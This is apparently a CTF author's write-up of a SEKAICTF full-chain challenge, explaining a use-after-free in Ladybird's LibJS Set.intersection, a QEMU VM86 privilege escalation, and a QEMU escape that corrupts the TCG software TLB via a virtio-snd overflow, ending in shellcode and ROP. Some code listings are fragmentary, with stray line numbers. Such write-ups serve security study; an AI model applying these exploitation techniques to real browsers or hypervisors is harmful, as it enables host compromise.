A full-chain SEKAICTF 2026 challenge covering Ladybird, a QEMU LPE, and a QEMU escape.
With a clear decline on competiveness across the board for CTFs, now AI has taken over, we decided to make some harder challenges for this last year.
And so I’ve created two challenges for SEKAICTF this year starting with a full chain, combining two 0days and a new way to exploit a n-day with less primitives than previous researchers from ottersec.
The first part of the challenge is to escape the ladybird LibJS shell. This requires an 0day, since we’re running pretty much the latest version. I was planning to do a LibJS challenge for a while now, since I had been hoarding an 0day for over a year (ever since I previously saw a ladybird challenge). But sadly, some time before the CTF started it was patched.
Another funny thing that happened two weeks before the CTF, when the LibJS (/ ladybird) part was already done, a commit dropped that killed my original exploitation technique for this new bug.
Bug
So since our last 0day has been patched, we have to find a new one. For the challenge itself, I patched out all the internal functions, except gc() (I was feeling nice) and compiled a js only shell.
The intended bug for this challenge lies in Set.intersection:
SetPrototype.c
1
// 24.2.4.9 Set.prototype.intersection ( other ), https://tc39.es/ecma262/#sec-set.prototype.intersection
auto other_record =TRY(get_set_record(vm, vm.argument(0)));
12
13
// 4. Let resultSetData be a new empty List.
14
auto result =Set::create(realm);
15
16
// 5. If SetDataSize(O.[[SetData]]) ≤ otherRec.[[Size]], then
17
if (set->set_size() <= other_record.size) {
18
// a. Let thisSize be the number of elements in O.[[SetData]].
19
// b. Let index be 0.
20
// c. Repeat, while index < thisSize,
21
for (autoconst& element : *set) { // [1]. BUG
22
// i. Let e be O.[[SetData]][index].
23
// ii. Set index to index + 1.
24
// iii. If e is not empty, then
25
// 1. Let inOther be ToBoolean(? Call(otherRec.[[Has]], otherRec.[[SetObject]], « e »)).
26
auto in_other =TRY(call(vm, *other_record.has, other_record.set_object, element.key)).to_boolean();
27
28
// 2. If inOther is true, then
29
if (in_other) {
30
// a. NOTE: It is possible for earlier calls to otherRec.[[Has]] to remove and re-add an element of O.[[SetData]], which can cause the same element to be visited twice during this iteration.
31
// b. If SetDataHas(resultSetData, e) is false, then
32
if (!set_data_has(result, element.key)) {
33
// i. Append e to resultSetData.
34
result->set_add(element.key);
35
}
36
}
37
38
// 3. NOTE: The number of elements in O.[[SetData]] may have increased during execution of otherRec.[[Has]].
39
// 4. Set thisSize to the number of elements in O.[[SetData]].
40
}
41
}
42
// 6. Else,
39 collapsed lines
43
else {
44
// a. Let keysIter be ? GetIteratorFromMethod(otherRec.[[SetObject]], otherRec.[[Keys]]).
45
auto keys_iterator =TRY(get_iterator_from_method(vm, other_record.set_object, other_record.keys));
46
47
// b. Let next be NOT-STARTED.
48
Optional<Value> next;
49
50
// c. Repeat, while next is not DONE,
51
do {
52
// i. Set next to ? IteratorStepValue(keysIter).
53
next =TRY(iterator_step_value(vm, keys_iterator));
54
55
// ii. If next is not DONE, then
56
if (next.has_value()) {
57
// 1. Set next to CanonicalizeKeyedCollectionKey(next).
58
next =canonicalize_keyed_collection_key(*next);
59
60
// 2. Let inThis be SetDataHas(O.[[SetData]], next).
61
auto in_this =set_data_has(set, *next);
62
63
// 3. If inThis is true, then
64
if (in_this) {
65
// a. NOTE: Because other is an arbitrary object, it is possible for its "keys" iterator to produce the same value more than once.
66
67
// b. If SetDataHas(resultSetData, next) is false, then
68
if (!set_data_has(result, *next)) {
69
// i. Append next to resultSetData.
70
result->set_add(*next);
71
}
72
}
73
}
74
} while (next.has_value());
75
}
76
77
// 7. Let result be OrdinaryObjectCreate(%Set.prototype%, « [[SetData]] »).
78
// 8. Set result.[[SetData]] to resultSetData.
79
80
// 9. Return result.
81
return result;
82
}
The bug here is auto const& element : *set, where element is not a copy, but a reference into the backing store of the set. A Set in LibJS is backed by a Map:
This frees the backing bucket in [1], runs the gc() and creates a WeakMap whose backing store overlaps with the old Set storage.
Just like a regular Set, the backing store of a WeakMap is a HashMap, but in this case: HashMap<GC::Ptr<Cell>, Value> m_values instead of HashMap<Value, Value, ValueTraits> m_entries; for a Map (So a Set as well).
So in this case we try to reclaim a Value from the Set (8 bytes) with a GC::Ptr<Cell> from the WeakMap also 8 bytes (pointer), for which the pointer converted back to a Value is a f64 -> leak.
This basically is our addrOf primitive from which we can target an ArrayBuffer as victim.
From here there’s many ways to get r/w into code exec, I’ll give an example:
1
let map =newMap();
2
map.set(bucket0, u64ToF64(MAP_FAKE_HEADER));
3
map.set(bucket1, u64ToF64(validationAddr));
4
5
let iterator = map.entries();
6
iterator.a =u64ToF64(MAP_FAKE_HEADER);
Where bucket0 and bucket1 are chosen so the hashes land in the first and second bucket respectively. Then we try and leak the MapIterator object and interpret like:
So now we can read i.e. reader[13] == reader->m_indexed_elements[13] == iterator->m_map[13]. From here we can recover the bucket==reader[13] and read/write into the buckets array. From here we have the following layout:
Then we can fakeobj over the bucket+8 to mirror the MapIterator as previously and get a limited read / write by overwriting the m_indexed_elements using map.set(bucket1, u64ToF64(addr)). From there we repeatedly target an ArrayBuffer’s data pointer to get full a/b r/w. From there we leak the vtable, get libc, read environ, find return address on the stack and ROP to execve and run our next stage.
Footnotes
We use the base64 as to not accidentally reclaim it with other objects ↩
Escalating privileges inside QEMU through a VM86 iret bug.
For the second part of the challenge, we need to somehow gain root (or at least higher privileges) to talk to the virtio-snd device. And because I’ve been hoarding an 0day for this as well for a little bit, it was a perfect fit for this challenge. Although, a current 0day has already been published (without patches) by kqx, the challenge introduces a patch and we have to hunt for a new one.
The issue here is that QEMU jumps to return_to_vm86 as soon EFLAGS.VM is set, before rejecting this transition from usermode. return_to_vm86 then just loads the EFLAGS with VM_MASK and IOPL_MASK allowed, so we can add IOPL=3 which in qemu gives a/b physical r/w again, amazing work from the kqx people.
Exploit
It’s easier to show the full exploit path to show what is happening:
Escaping QEMU by targeting the TCG software TLB from virtio-snd.
Finally we get to exploit QEMU, a different patch reintroduces a bug previously exploited by ottersec, before reading through the next part, I recommend reading through it to get an understanding of the problem as I’ll just go over the exploitation of that bug.
Anyway, ottersec needed another device driver to escape the guest. This challenge doesn’t give you this luxury and you have to exploit (escape) the guest without it.
Some other fun things about this challenge, the kernel is minimally compiled and doesn’t expose any functionality things required to actually talk to the driver. You have to create this yourself (If you even need them! More on this later).
For this challenge, I’ll go over two ways to exploit this, one original intended path and another (less intended) path created by an unnamed entity during the game that just happened to fall into my hands.
Intended Exploit
First of all, credits for the exploitation idea comes from dicectf bassoon:
Note (Bassoon writeup)
first part is getting consistent heap corruption primitives using the fact that all 7 0x100 tcache entries are almost always contiguous. from here you can get overlapping chunks and prepare a UAF write. next part is figuring out what structure to actually target. we don’t have partial overwrite which forces us to target something that gets allocated after our corruption, and prevents us from dealing with things containing absolute addresses. most important things are allocated in the main heap, and the thread heap is mostly used by TCG.
there may be multiple approaches, but my solution is to overwrite entries in the TCG fast path CPUTLBEntry table, which basically implements the TLB for guest virtual to host virtual address translation. it gets reallocd on the thread heap in tlb_mmu_resize_locked which gets triggered either periodically from tlb_flush_by_mmuidx_async_work which we can’t control very well, or on a single page flush if the page is a large (huge) page. we can thus flush a huge page with invlpg to trigger resizing. the new size is based on a rate calculated within a 100 ms window, so we want to busy loop at cpl0 after the first flush to get a low rate and downsize the table.
there are tables for each mmu_idx type, which is an arch-based classifier. for x64, there are 3 main ones: usermode, kernel mode, and kernel mode running usermode code through SMAP. you could simplify the exploitation by doing it all through one mmu_idx so you don’t need to context switch to trigger TLB activity between invlpg’ing, but i just did it with the usermode TLB anyway and had a kernel module that let me call my own userspace functions at cpl0. the noise taming part is very difficult, since TCG is constantly allocating chunks of 0x28 to insert nodes into qtree during TCG translation within tb_gen_code (called for each basic block). we get around this by stuffing all of our important operations for triggering heap activity like the intel HDA writes and invlpgs into single basic blocks at a time.
we get overlapping chunks and free a size 0x810 for the fast TLB to reclaim when it downsizes to minimum size of 0x40 (0x20 size per entry). each entry in the table has 3 virtual addresses and one addend. the virtual addresses correspond to the guest virtual addresses translations for read, write, and code accesses, and the addend gets added to the virtual address to calculate the host address. we can’t control the addend usefully without leaks, but we can overwrite the virtual address, and the difference between our overwritten one and the old one effectively gets added to the addend during translation. this is how we are able to get reliable memory corruption leaklessly, and i think it’s a pretty cool and novel technique.
the host address a virtual address maps to is dependent on the physical address, so we can get a reliable location in the mapping space by having our vaddr tied to a fixed physical address like 0. the thread heap arena is consistently 0x7e00000 bytes behind the host mapping for physical address 0. 0x7e0 & 0x3f is also 0 so this will be placed at index 0 in the table making it easy to overflow into. so we first map 0x7e00000 to 0, and now overflow the virtual addresses to 0, and when we deref 0 it will hit the TLB and translate as (intended host address - 0x7e00000) + 0 which we have established is just the thread heap arena.
so now we have arb read/write into the first page of the arena which contains things like tcache bins and various pointers to other regions. i leaked the rwx region and main heap, then overwrote two tcache entries to first write shellcode to the rwx region and then overwrite a function pointer in the main heap with a pointer to the shellcode.
all of the past qemu exploits i’ve seen for real vulns usually try to get some explicit leak primitive either from a separate vuln or some random device, but i think it’s cool that it’s theoretically possible in a stable enough environment to do this sort of leakless technique. it does rely on TCG though, maybe i’ll try this challenge again but with KVM and see if it’s still possible.
The compiled kernel doesn’t expose much / if anything to interact with the device, so my solver patches in a couple utilities using the physical r/w:
virtual to physical
remapping an userspace virtual page to an arbtrary guest physcial 4k page
install a 2MiB page-table mapping
invlpg
(setuid)
TLB / Target
So a quick background recap on the TLB cache; A normal CPU has a Translation Lookaside Buffer, or TLB. It is a cache for page table translations. Instead of walking page tables on every memory access, the
CPU remembers that a virtual page recently translated to a particular physical page with particular permissions.
Say:
When an operating system changes page tables, old cached translations may no longer be correct. A TLB flush invalidates those cached translations. On x86, invlpg addr invalidates the cached translation for one virtual page, while operations such as CR3 reloads can invalidate many
entries.
In this exploit, however, the interesting TLB is not the host CPU’s hardware TLB. The interesting object is QEMU TCG’s software TLB. TCG-generated host code also wants memory accesses to be fast, so QEMU keeps its own cache of guest virtual address translations. That cache lives in normal QEMU heap memory.
For a guest RAM access in system emulation, the path is roughly:
guest virtual address
|
v
QEMU TCG software TLB lookup
|
+-- hit -> host pointer = guest address + entry.addend
The three addr_* fields are compare values for read, write, and instruction fetch accesses. The addend is the part that turns a guest virtual address into a host pointer:
So this is good primitive to target, since it directly decides which host
address QEMU reads or writes.
The lookup table is indexed by the guest virtual page:
For the minimum table size used later, there are 64 entries, so the mask is
0x3f. Guest address 0 and guest address 0x8000000 both land in index 0:
(0x0 >> 12) & 0x3f = 0
(0x8000000 >> 12) & 0x3f = 0
That lets the exploit first create a legitimate entry for 0x8000000, then
corrupt only the compare fields so the same entry also appears valid for guest address 0.
Before corruption, entry 0 looks like:
CPUTLBEntry[0]
+-----------------------------------+
| addr_read = 0x8000000 | flags |
| addr_write = 0x8000000 | flags |
| addr_code = ... |
| addend = host_ptr - 0x8000000 |
+-----------------------------------+
After the virtio-snd overflow writes into the first 0x10 bytes:
CPUTLBEntry[0]
+-----------------------------------+
| addr_read = 0 |
| addr_write = 0 |
| addr_code = ... |
| addend = host_ptr - 0x8000000 |
+-----------------------------------+
Now a guest load from virtual address 0 can pass the fast-path compare, but the preserved addend still points at the host location derived from the old
0x8000000 translation:
host = 0 + (host_ptr - 0x8000000)
For us that lands inside QEMU’s host heap.
Primitives
A QEMU TLB flush invalidates entries in this software cache. For a full flush of one MMU index, QEMU clears the entry table and resets accounting:
For a single-page flush, QEMU normally invalidates one table entry. But QEMU also tracks large-page translations. If the flushed page belongs to a tracked large page, tlb_flush_page_locked() escalates to a full flush for that MMU index:
if (tlb_flush_entry_locked(tlb_entry(cpu, midx, page), page)) {
11
tlb_n_used_entries_dec(cpu, midx);
12
}
13
tlb_flush_vtlb_page_locked(cpu, midx, page);
14
}
15
}
We can use this, to i.e. flip a mapped guest region to PROT_NONE and back to PROT_READ | PROT_WRITE. Inside the guest, that makes the kernel update page tables and flush stale guest translations. In TCG, those guest invalidations cause QEMU to throw away affected software TLB entries.
Then with our inserted invlpg primitive, we can install HUGE_VADDR as a 2 MiB mapping. The i386 TCG helper for invlpg reaches:
Because HUGE_VADDR is a large mapping, QEMU’s large-page tracking can turn that single-page invalidation into the full-MMU-index flush path and the resize logic is tied to full-table flushing.
The TCG TLB tables are dynamic. QEMU tracks how many entries were used in a
short time window. When a flush happens, tlb_mmu_resize_locked() may grow or shrink the table based on that recent usage rate.
The important part for exploitation is that a resize is a normal heap free and allocation:
So by touching many guest pages, we can make the table grow. This raises
desc->n_used_entries and therefore window_max_entries; once the used-entry
rate crosses 70%, QEMU doubles the table. Later, after the target 0x810 RX
hole has been freed, we do the opposite: touch only one or a few pages, trigger
a flush, wait for the 100 ms resize window to expire, and trigger another
flush. At that point window_max_entries is tiny relative to the old table, so
rate < 30 and QEMU shrinks to MAX(pow2ceil(window_max_entries), 1 << CPU_TLB_DYN_MIN_BITS). With one useful entry, that is the minimum fast
table: 64 entries.
64 * sizeof(CPUTLBEntry)
64 * 0x20 = 0x800-byte allocation
glibc chunk size = 0x810
First of all a note on our virtio-snd primtives, we have:
include/hw/audio/virtio-snd.h
16 collapsed lines
1
/*
2
* VirtIOSoundPCMBuffer has a dynamic size since it includes the raw PCM data
3
* in its allocation. It must be initialized and destroyed as follows:
4
*
5
* size_t size = [[derived from owned VQ element descriptor sizes]];
Important is the size 0x410, since it makes the RX overflow land exactly on the fields we want in the next allocation. The vulnerable source is an RX buffer with in_len = 0x3d8:
RX data size = in_len - sizeof(virtio_snd_pcm_status)
The source stream’s period_bytes is 0x3f7, while buffer->data starts at
offset 0x29. So the buggy audio write reaches:
0x29 + 0x3f7 = 0x420 bytes from the source user pointer
The next chunk’s user pointer starts at 0x410, so the overflow reaches:
0x420 - 0x410 = 0x10 bytes into the next allocation
That is exactly two qwords: CPUTLBEntry.addr_read and
CPUTLBEntry.addr_write, and we can reuse the 0x410 for the tcache
It’s also the last default small tcache size:
idx = (0x410 - 0x20) / 0x10 = 0x3f
So we can reuse that for the a/b write as well.
Exploit
Combining this (and a bit of heap grooming), we can achieve something like:
Spray some 0x810 chunks with live virtio-snd TX filler buffers
(fill810, TX_HOLE_FILLER_DATA_LEN = 0x7d0).
Spray some 0x410 chunks with live virtio-snd TX guard buffers
(guard410, TX_SMALL_FILLER_DATA_LEN = 0x3d0).
Grow user-mode TLB table
The idea is to shrink the TLB table later so it occupies a 0x810 chunk
Free only the target-side 0x810 chunk(s), this is possible because of the different streams we can only free this target.
[source RX buffer: 0x410 live] [target 0x810 chunk: free]
Shrink the TCG TLB so CPUTLBEntry[64] reclaims a freed 0x810 target hole.
[source RX buffer: 0x410 live] [0x810 chunk: TLB table]
Overflow from the live 0x410 source into CPUTLBEntry[0].
Use guest NULL as a host heap page window.
We can probe this a bit by capturing segfaults from the guest to see if it succeeded.
Also, this first page immediately gives us a text and TCG code-cache rwx leak
Edit tcache metadata in that page.
For arbitrary write, we need a bit more, so we find the tcache_perthread_struct, which in this page and write a pointer into the tcache->entries[0x3f] and use the 0x410 allocation
Use TX allocations as targeted host writes.
Write an RWX system stub and overwrite helper_info_fninit.func.
Guest executes FNINIT1 -> helper_info_fninit.func -> rwx region -> system
We can actually stablize this all a bit by using i.e. multiple targets, so multiple holes where the TLB table might get allocated.